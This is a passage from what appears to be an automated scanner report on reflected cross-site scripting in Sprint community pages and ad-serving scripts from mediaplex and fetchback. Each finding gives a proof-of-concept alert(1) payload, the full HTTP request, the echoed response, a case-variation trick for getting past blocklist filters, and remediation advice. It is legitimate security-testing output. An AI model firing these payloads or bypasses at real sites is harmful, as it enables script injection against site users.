fileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless72004";alert(1)//f27891277f2/customer-service/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErr
...[SNIP]...

5.41. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless/customer-servicee620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=131245 t=1315099174578986
Connection: close
Content-Length: 40628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless/customer-servicee620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.42. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0f1a"%3balert(1)//887e419074d was submitted in the REST URL parameter 4. This input was echoed as d0f1a";alert(1)//887e419074d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless/customer-serviced0f1a"%3balert(1)//887e419074d/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=171254 t=1315099175790172
Connection: close
Content-Length: 40583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
p = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless/customer-serviced0f1a";alert(1)//887e419074d/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.43. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49680"%3balert(1)//4dc0b3f35fc was submitted in the REST URL parameter 3. This input was echoed as 49680";alert(1)//4dc0b3f35fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless49680"%3balert(1)//4dc0b3f35fc/general/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:36 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=129929 t=1315099176570665
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
fileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless49680";alert(1)//4dc0b3f35fc/general/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip
...[SNIP]...

5.44. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb/general/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 9
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=130149 t=1315099175310012
Connection: close
Content-Length: 40601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb/general/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.45. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless/general5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:44 GMT
Server: Apache-Coyote/1.1
X-JAL: 11
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=453971 t=1315099184012772
Connection: close
Content-Length: 40601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless/general5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.46. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35f30"%3balert(1)//0d70885b912 was submitted in the REST URL parameter 4. This input was echoed as 35f30";alert(1)//0d70885b912 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless/general35f30"%3balert(1)//0d70885b912/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:45 GMT
Server: Apache-Coyote/1.1
X-JAL: 9
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=217937 t=1315099185636976
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless/general35f30";alert(1)//0d70885b912/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.47. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/sprintblogs5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf/buzz-by-sprint/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:25 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=121050 t=1315099165474445
Connection: close
Content-Length: 40604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/sprintblogs5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf/buzz-by-sprint/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.48. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ba4c"%3balert(1)//4747f9a3021 was submitted in the REST URL parameter 3. This input was echoed as 4ba4c";alert(1)//4747f9a3021 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/sprintblogs4ba4c"%3balert(1)//4747f9a3021/buzz-by-sprint/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:26 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=129521 t=1315099166685309
Connection: close
Content-Length: 40559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ar profileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/sprintblogs4ba4c";alert(1)//4747f9a3021/buzz-by-sprint/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerError
...[SNIP]...

5.49. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcde9"%3balert(1)//a061888315 was submitted in the REST URL parameter 4. This input was echoed as bcde9";alert(1)//a061888315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/sprintblogs/buzz-by-sprintbcde9"%3balert(1)//a061888315/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 8
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=199323 t=1315099175395176
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ngTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/sprintblogs/buzz-by-sprintbcde9";alert(1)//a061888315/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.50. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/sprintblogs/buzz-by-sprint67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 8
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=162814 t=1315099174017960
Connection: close
Content-Length: 40604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/sprintblogs/buzz-by-sprint67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.51. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66de4'%3balert(1)//23d1f4a63b3 was submitted in the mpck parameter. This input was echoed as 66de4';alert(1)//23d1f4a63b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D35795102566de4'%3balert(1)//23d1f4a63b3&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/ HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4598
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=35795102566de4';alert(1)//23d1f4a63b3" target="_blank">
...[SNIP]...

5.52. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0a59"-alert(1)-"3dcd426b95b was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/ HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:20 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4592
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b");
mpck =
...[SNIP]...

5.53. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6e5e"%3balert(1)//5a3f34f4b67 was submitted in the mpvc parameter. This input was echoed as c6e5e";alert(1)//5a3f34f4b67 in the application's response.

This proof-of-concept attack demonstrates that the double quotation mark is not encoded and terminates the string literal. Note that in this position the echoed payload sits inside the still-open argument list of encodeURIComponent(, so the response as shown is a JavaScript syntax error and alert(1) does not run; a payload that keeps the expression balanced, such as the "-alert(1)-" form used against the same script in 5.52, executes.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/c6e5e"%3balert(1)//5a3f34f4b67 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4594
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://c.casalemedia.com/c/1/1/89733/c6e5e";alert(1)//5a3f34f4b67");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://c.casalemedia.com/c/1/1/89733/c6e5e";alert(1)//5a3f34f4b67");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc
...[SNIP]...

5.54. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4785'%3balert(1)//c24c09353c6 was submitted in the mpvc parameter. This input was echoed as a4785';alert(1)//c24c09353c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/a4785'%3balert(1)//c24c09353c6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:35 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4594
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://c.casalemedia.com/c/1/1/89733/a4785';alert(1)//c24c09353c6http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025" target="_blank">
...[SNIP]...

5.55. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73ced"-alert(1)-"46bd39e34f8 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

